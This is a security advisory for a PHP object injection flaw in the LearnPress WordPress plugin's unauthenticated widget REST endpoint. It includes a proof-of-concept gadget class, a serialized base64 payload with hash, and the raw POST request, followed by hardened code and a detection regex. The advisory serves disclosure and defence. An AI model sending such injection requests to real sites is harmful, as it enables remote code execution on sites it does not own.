The LearnPress WordPress plugin before 4.1.7.2 unserialises user input in a REST API endpoint available to unauthenticated users, which could lead to PHP Object Injection when a suitable gadget is present, leading to remote code execution (RCE). To successfully exploit this vulnerability attackers must have knowledge of the site secrets, allowing them to generate a valid hash via the wp_hash() function.
Proof of Concept:
To simulate a gadget chain, put the following code in a plugin:
<?php
// Stand-in gadget: its __wakeup() runs as soon as unserialize() rebuilds the object
class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}
Payload:
{
"widget":"learnpress_widget_course_extra",
"instance":"Tzo0OiJFdmlsIjowOnt9Ow==",
"hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"
}
- instance is the base64 encoding of the serialized object: O:4:"Evil":0:{}
- hash is calculated by: wp_hash(base64_decode($instance))
POST /wp-json/lp/v1/widgets/api?_locale=user HTTP/1.1
Content-Type: application/json
Content-Length: 123

{
"widget":"learnpress_widget_course_extra",
"instance":"Tzo0OiJFdmlsIjowOnt9Ow==",
"hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"
}
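For comparison, the following is an added illustration (not LearnPress's own code) of the unsafe pattern the advisory describes beside a hardened variant; the lp_* function names are hypothetical, while wp_hash() is WordPress's real function and hash_equals()/unserialize() are PHP's.

```php
<?php
// Added illustration, not LearnPress's code. Function names prefixed lp_ are
// hypothetical; wp_hash() is WordPress's real helper (HMAC over the site secrets).

// Unsafe: the hash only proves the sender knows the site secrets. It says nothing
// about what the serialized bytes contain, so any class with a __wakeup()/__destruct()
// gadget is instantiated the moment unserialize() runs.
function lp_widget_instance_unsafe(array $body) {
    $raw = base64_decode((string) ($body['instance'] ?? ''), true);
    if ($raw === false || !hash_equals(wp_hash($raw), (string) ($body['hash'] ?? ''))) {
        return null;
    }
    return unserialize($raw);
}

// Hardened: never let unserialize() build objects from request data. With
// allowed_classes => false every "O:" record becomes __PHP_Incomplete_Class and
// no magic method runs; widget settings are expected to be a plain array anyway.
function lp_widget_instance_hardened(array $body) {
    $raw = base64_decode((string) ($body['instance'] ?? ''), true);
    if ($raw === false || !hash_equals(wp_hash($raw), (string) ($body['hash'] ?? ''))) {
        return null;
    }
    if (lp_contains_serialized_object($raw)) {
        // Log and refuse: a widget instance has no business carrying objects.
        error_log('lp widgets: rejected serialized object in instance parameter');
        return null;
    }
    $instance = @unserialize($raw, ['allowed_classes' => false]);
    return is_array($instance) ? $instance : null;
}

// Cheap triage check usable in a WAF rule or log review: does the decoded
// payload contain a PHP object record (O:<len>:"Class" or C:<len>:"Class")
// at the start or right after a record separator? (May false-positive on
// string values that happen to contain such text; tune before blocking.)
function lp_contains_serialized_object(string $raw): bool {
    return preg_match('/(?:^|[;{])[OC]:\d+:"/', $raw) === 1;
}
```

Applied to the request above, the hardened variant returns null and writes a log line instead of instantiating Evil, while a legitimate array-valued instance still round-trips.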
Reference: